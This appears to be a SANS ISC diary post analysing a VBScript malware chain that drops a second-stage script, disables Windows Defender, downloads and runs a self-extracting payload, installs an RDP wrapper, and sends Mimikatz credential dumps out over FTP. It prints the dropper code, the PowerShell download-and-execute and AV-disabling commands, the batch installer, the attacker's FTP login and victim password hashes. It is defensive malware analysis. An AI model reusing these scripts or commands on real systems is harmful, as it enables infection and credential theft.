|
Let’s review a malware sample that I spotted a few days ago. I found it interesting because it's not using deep techniques to infect its victims. The initial sample is a malicious VBScript. For a few weeks, I started to hunt for more Powershell based on encoded directives. The following regular expression matched on the file: // New-Object $enc09 = /(TmV\x33LU\x39iamVjd[A-P]|[\x2b\x2f-\x39A-Za-z][\x2b\x2f-\x39A-Za-z][\x31\x35\x39BFJNRVZdhlptx]OZXctT\x32JqZWN\x30[\x2b\x2f-\x39A-Za-z]|[\x2b\x2f-\x39A-Za-z][\x30EUk]\x35ldy\x31PYmplY\x33[Q-T])/ The initial script (SHA256:bf06b682c637d470b15e3c7b76e6d25356719286cfcc75a12bf3c31be859d2b5) is, still today, detected by only one AV engine[1]. Here is a beautified version of the script:
sDir = "C:\ProgramData\ID.dat"
Set oFSO = CreateObject("Scripting.FileSystemObject")
If oFSO.FileExists(sDir) Then
Set objFSO = CreateObject("Scripting.FileSystemObject")
objFSO.DeleteFile WScript.ScriptFullName
WScript.Quit()
Else
wscript.sleep(333000)
Dim ShaDev
set hfhejotgbhzlzyohafchtul = createobject("wscript.shell")
ShaDev = hfhejotgbhzlzyohafchtul.ExpandEnvironmentStrings("%ProgramData%")
Set shadow=CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64")
shadow.dataType="bin.base64"
shadow.text="... [Base64 chunk of dat] ..."
Set sexy=CreateObject("ADODB.Stream")
sexy.Type=1
sexy.Open
sexy.Write shadow.nodeTypedValue
sexy.SaveToFile ShaDev & "\WindowsProtect.vbs",2
wscript.sleep(4000)
Sub KillAll(ProcessName)
Dim objWMIService, colProcess
Dim strComputer, strList, p
strComputer = "."
Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colProcess = objWMIService.ExecQuery ("Select * from Win32_Process Where Name like '" & ProcessName & "'")
For Each p in colProcess
p.Terminate
Next
End Sub
KillAll "cmd.exe"
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Do
Running = False
Set colItems = objWMIService.ExecQuery("Select * from Win32_Process")
For Each objItem in colItems
If objItem.Name = "cmd.exe" Then
Running = True
Exit For
End If
Next
If Not Running Then
Set objShell = CreateObject("Shell.Application")
objShell.ShellExecute "cmd", "/k ""C:\ProgramData\WindowsProtect.vbs", "", "runas", 0
End If
Loop While Not Running
WScript.Sleep 4000
KillAll "cmd.exe"
Dim fso, MyFile
Set fso = CreateObject("Scripting.FileSystemObject")
Set MyFile = fso.CreateTextFile("C:\ProgramData\ID.dat", True)
MyFile.WriteLine(" ")
MyFile.Close
Set objFSO = CreateObject("Scripting.FileSystemObject")
objFSO.DeleteFile WScript.ScriptFullName
WScript.Quit()
End If
Not obfuscated, it is easy to understand its behaviour: First, it checks the presence of itself (if the victim has already been infected) by checking the existence of an ‘ID.dat’ file. If it exists, it removes the file and exits. Otherwise, another second-stage VBScript is decoded, dumped on disks and executed (‘WindowsProtect.vbs’). Let’s have a look at the second stage. The decoded Base64 data (SHA256:6a25a0dbc0627e36e307e87e677e307d08982720c3dbeffe9986c3c770c37fa8) is unknown on VT. Here is the script:
Dim x
Dim y
Dim z
x = " Set-MpPreference -DisableIOAVProtection $true"
y = " Add-MpPreference -ExclusionPath 'C:\'"
z = " -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('hxxp://92[.]53[.]91[.]141/MP3/T0R.mp3','C:\ProgramData\Isass.exe');Start-Process 'C:\ProgramData\Isass.exe'"
Dim objShell
Set objShell = WScript.CreateObject("WScript.Shell")
command = ("powershell" & x )
commany = ("powershell" & y )
commanz = ("powershell" & z )
objShell.Run command,0
wscript.sleep(4000)
objShell.Run commany,0
wscript.sleep(11000)
objShell.Run commanz,0
Set objShell = Nothing
wscript.sleep(4000)
Set objFSO = CreateObject("Scripting.FileSystemObject")
objFSO.DeleteFile WScript.ScriptFullName
WScript.Quit
The next stage is, of course, the malicious PE file (SHA256:b5cc67c06f1352039209557aa8e62e1eabefaa4646fe449326bf50f62382eacd) and is also unknown on VT. It’s a classic PE file: root@remnux:~# exiftool Isass.exe ExifTool Version Number : 9.46 File Name : Isass.exe Directory : /tmp File Size : 4.6 MB File Modification Date/Time : 2019:08:22 14:44:24-04:00 File Access Date/Time : 2019:08:22 14:44:23-04:00 File Inode Change Date/Time : 2019:08:22 14:44:24-04:00 File Permissions : rw-r--r-- File Type : Win32 EXE MIME Type : application/octet-strea Machine Type : Intel 386 or later, and compatibles Time Stamp : 2017:08:11 09:54:06-04:00 PE Type : PE32 Linker Version : 14.0 Code Size : 188928 Initialized Data Size : 69632 Uninitialized Data Size : 0 Entry Point : 0x1cec9 OS Version : 5.1 Image Version : 0.0 Subsystem Version : 5.1 Subsystem : Windows GUI The PDB path ('D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb') discloses that the PE file is a self-extracting archive. Program Data Base files are used to keep debugging info about a program when it is compiled. The PDB stores many interesting data like symbols, addresses, names of resources etc. SFX files can execute a script once the content is unpacked. Easy to detect in the PE strings: root@remnux:~# strings Isass.exe | grep Setup= Setup=%SystemDrive%\Intel\Logs\h32.exe %SystemDrive%\Intel\Logs\beforeinstall.bat Here is an extract of the script: @echo off set CURRENTPATH=%SystemDrive%\Intel\Logs set INSTALLPATH=%SystemDrive%\ProgramData\Microsoft\Windows\Updates mkdir %INSTALLPATH% del /F /Q %INSTALLPATH%\install.bat move /Y %CURRENTPATH%\Tor %INSTALLPATH% move /Y %CURRENTPATH%\Data %INSTALLPATH% move /Y %CURRENTPATH%\Service %INSTALLPATH% move /Y %CURRENTPATH%\h64.exe %INSTALLPATH%\h64.exe move /Y %CURRENTPATH%\h32.exe %INSTALLPATH%\h32.exe move /Y %CURRENTPATH%\zip.exe %INSTALLPATH%\zip.exe move /Y %CURRENTPATH%\ncftpput.exe %INSTALLPATH%\ncftpput.exe move /Y %CURRENTPATH%\ftps.cfg %INSTALLPATH%\ftps.cfg move /Y %CURRENTPATH%\install.bat %INSTALLPATH%\install.bat move /Y %CURRENTPATH%\mimitask.bat %INSTALLPATH%\mimitask.bat reg Query "HKLM\Hardware\Description\System\CentralProcessor\0" | find /i "x86" > NUL && set OS=32BIT || set OS=64BIT if %OS%==32BIT set hidexe=h32.exe if %OS%==64BIT set hidexe=h64.exe cd %INSTALLPATH% %hidexe% install.bat >> %INSTALLPATH%\Service\install.log 2>>&1 cd %CURRENTPATH% rmdir /S /Q %CURRENTPATH%\Tor rmdir /S /Q %CURRENTPATH%\Data rmdir /S /Q %CURRENTPATH%\Tor DEL /Q /F %CURRENTPATH%\Data DEL /Q /F %CURRENTPATH%\Service DEL /Q /F %CURRENTPATH%\h64.exe DEL /Q /F %CURRENTPATH%\h32.exe DEL /Q /F %CURRENTPATH%\zip.exe DEL /Q /F %CURRENTPATH%\ncftpput.exe DEL /Q /F %CURRENTPATH%\ftps.cfg DEL /Q /F %CURRENTPATH%\install.bat DEL /Q /F %CURRENTPATH%\mimitask.bat rmdir /S /Q %CURRENTPATH% DEL /Q /F "%~f0" > NUL You can see that many files are dropped on the infected computer. The more interesting ones are:
The ‘install.bat’ script is also very interesting (SHA256:550e8e6fcfc4db2139dfa2e6e4f26e881b405e21b752a750d4cc682da0361567) and also unknow on VT. Too big to be posted here, here is an overview of its features:
The RDP wrapper is fetched from another site: hxxp://yourdatafor[.]me:94/azaza/:
Collected data are exfiltrated via FTP (FTP is still alive!) via the ncftpput.exe tool. The configuration is present in the archive in the ftps.cfg file: root@remnux:~# cat ftps.cfg host etomakra.me user ftpuser pass Super123123 Yes, even attackers use weak passwords! The server is not protected and allows to download all files collected from victims. The domain 'etomakra.me' has been registered on July 16th 2019. I synchronized them during a few days (now the FTP server is down). For each victim, two files were uploaded: The first one contains the malware installation logs:
root@remnux:~# unzip -t PLAYBOX1_RDP.zip
Archive: PLAYBOX1_RDP.zip
testing: Program Files/RDP Wrapper/hostname.log OK
testing: Program Files/RDP Wrapper/installer.log OK
testing: Program Files/RDP Wrapper/tor_install.log O
No errors detected in compressed data of PLAYBOX1_RDP.zip.
The second one contains the output of Mimikatz:
root@remnux:~# unzip -t DESKTOP-UII5HVF_82742.zip
Archive: DESKTOP-UII5HVF_82742.zip
testing: ProgramData/Microsoft/NetFramework/Test/credoz.txt OK
No errors detected in compressed data of DESKTOP-UII5HVF_82742.zip.
Each archive contains the same file 'credoz.txt':
root@remnux:~# head -30 credoz.txt
Hostname: [redacted] / authority\system-authority\system
.#####. mimikatz 2.1.1 (x64) #17763 Feb 23 2019 12:03:02
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition **
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(powershell) # sekurlsa::logonpasswords
Authentication Id : 0 ; 2254335948 (00000000:865e6fcc)
Session : RemoteInteractive from 2
User Name : Admlnlstrator
Domain : [redacted]
Logon Server : [redacted]
Logon Time : 2019/08/17 19:33:43
SID : S-1-5-21-2984074050-2788484596-579673664-1006
msv :
[00000003] Primary
* Username : Admlnlstrator
* Domain : [redacted]
* NTLM : eddcae2f04515b3a77e37ff4f5d2878d
* SHA1 : 0a19e0af02162b596b2bc58f0c9f26c1ddfad698
[00010000] CredentialKeys
* NTLM : eddcae2f04515b3a77e37ff4f5d2878d
* SHA1 : 0a19e0af02162b596b2bc58f0c9f26c1ddfad698
tspkg :
wdigest :
* Username : Admlnlstrator
You can see that the rogue administrator account has been used. In one week, I collected 188 credential files from the FTP server! Based on the re-upload of new files at every reboot, the number of unique victims is 53:
root@remnux:~# ls -1 creds/*.zip|awk -F "_" '{ print $1 }'|sort -u|wc -l
53
Did you see the same kind of activity? Do you have more information about this malware? Feel free to share! [1] https://www.virustotal.com/gui/file/bf06b682c637d470b15e3c7b76e6d25356719286cfcc75a12bf3c31be859d2b5/detection Xavier Mertens (@xme) |
Xme 537 Posts ISC Handler Aug 23rd 2019 |
| Subscribe |
Aug 23rd 2019 11 months ago |
Sign Up for Free or Log In to start participating in the conversation!
